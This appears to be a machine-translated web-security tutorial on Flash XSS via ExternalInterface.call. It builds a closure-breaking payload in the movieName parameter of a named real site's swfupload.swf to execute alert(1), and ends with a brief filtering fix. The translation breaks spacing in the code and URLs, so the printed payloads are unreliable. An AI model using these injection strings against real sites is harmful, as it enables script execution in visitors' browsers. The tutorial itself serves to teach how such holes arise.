In those years, we will learn XSS-15. Flash Xss advanced [ExternalInterface. call the first parameter].

In addition to the navigateToURL/getURL mentioned in the previous section, another as function that often has XSS defects is ExternalInterface. call. This function serves as the interface for the javascript communication between FLASH and the host page. Generally, there are two parameters. The first parameter is the name of the called js function, other parameters are the parameters of the called js function. When the parameters are controllable, whether the first or subsequent parameters are controllable, we can use them to implement XSS. This section describes how to control the first parameter.
1. first, let's talk about the basic knowledge from the programmer's perspective. Sometimes, we need to call the javascript Functions on the current page in FLASH. For example, after loading a game, execute the action that appears 1. Javascript code: alert (1) as code ExternalInterface. call ("alert", "1"); 2. Some programmers may think that it is too ugly to pop up 1 directly. So he wrote a js function myalert (str) {// to display a beautiful floating layer and display str on it .} Then ExternalInterface. call ("myalert", "1"); 3. another day, another programmer thought that the above programmer wrote good things, but his JS function name was not myalert, so he called the programmer to change the as code. So the programmer thought that he would write the code as follows, lest someone always call me to change the code. Var func: String = root. loaderInfo. parameters. func; // receives the func parameter ExternalInterface in FLASH. call (func, "1"); in this way, other people who want to use this FLASH do not need to modify the FLASH, but only need to call the FLASH with parameters. For example, if my JS function is newalert, I just need to call it as follows: http://some.com/xxx.swf?func= Newalert 4. The above process improves the reusability of the program and brings great convenience to developers, but it lacks security considerations. Attackers can execute their own code in the following ways: http://some.com/xxx.swf?func= (Function () {alert ("hi jack")}) 5. to facilitate understanding, we can set ExternalInterface. call ("function name", "parameter 1"); as the function name in JS ("parameter 1"); and The JS Code actually executed in FLASH, format: try {_ flash _ toXML (function name ("parameter 1");} catch (e) {"<undefined/>";} therefore, the function name can also be written as (function () {alert ("hi jack. 6. The above is the theoretical basis. With this foundation, it is relatively simple to look at the example. http://quan.qq.com/swf/swfupload.swf 7. For more information about decompilation, see the previous article. Let's look at how to find defects. 8. Because this is an AS3.0 FLASH file, we first determine whether FLASH has accepted parameters. As3.0 accepts the parameter method. All parameters are stored in the root. loaderInfo. parameters object. For example, aaa.swf? A = 1 & B = 2 & c = 3, then root. loaderInfo. parameters equals {"a": 1, "B": 2, "c": 3} 9. we can find the movieName variable. We can see that the movieName parameter of FLASH is stored in this. in movieName. 10. Further, this. movieName is included in this. flashReady_Callback and other variables. This. flashReady_Callback = ("SWFUpload. instances [\ "" + this. movieName) + "\"]. flashReady "); 11. let's take a further look at this. where is flashReady_Callback used. 12. Then let's see what the Simple function that calls this. flashReady_Callback looks like. As you can see, this parameter is finally executed in the first parameter of ExternalInterface. call. 13. Are you very excited. Let's assume that we call FLASH http://quan.qq.com/swf/swfupload.swf ? MovieName = aaaaaaaa then this. flashReady_Callback is equal to the following content. SWFUpload. instances ["aaaaaaaa"]. flashReady finally calls ExternalInterface. call ('swfupload. instances ["aaaaaaaa"]. flashReady '); 14. if we want to call our own JS code, we need to construct the closure, but you will find some problems .. We can make the following appearance at most. ExternalInterface. call ('swfupload. instances ["aaa"]; function SWFUpload () {}; SWFUpload ["aaa"]. flashReady '); but it cannot be correctly executed because SWFUpload. instances is not defined, so SWFUpload. instances ["aaa"] will fail. 15. What should I do? Here we need to get the knowledge in step 1. Replace "function name" with the first parameter of call. To the following format. Try {_ flash _ toXML (SWFUpload. instances ["aaaaaaaa"]. flashReady ("parameter 1");} catch (e) {"<undefined/>";} we construct it based on the above Code, try {_ flash _ toXML (SWFUpload. instances ["aaa"])} catch (e) {alert (1)}; // "]. flashReady ("parameter 1");} catch (e) {"<undefined/>";} Image Parsing: if the above line is hard to understand, it is easy to write. Try {__ flash _ toXML (SWFUpload. instances ["aaa"]) // This line of code, because SWFUpload is not defined, an error occurs, jump to the catch part} catch (e) {alert (1 ); // This will be executed .}; // "]. FlashReady ("parameter 1");} catch (e) {"<undefined/>";} 16. finally, we put the constructed code into the FLASH parameters. http://quan.qq.com/swf/swfupload.swf ? MovieName = aaa "])} catch (e) {alert (1)}; // You Can See That alert (1) is successfully executed)


 Solution:Checks or filters the strings passed in the call.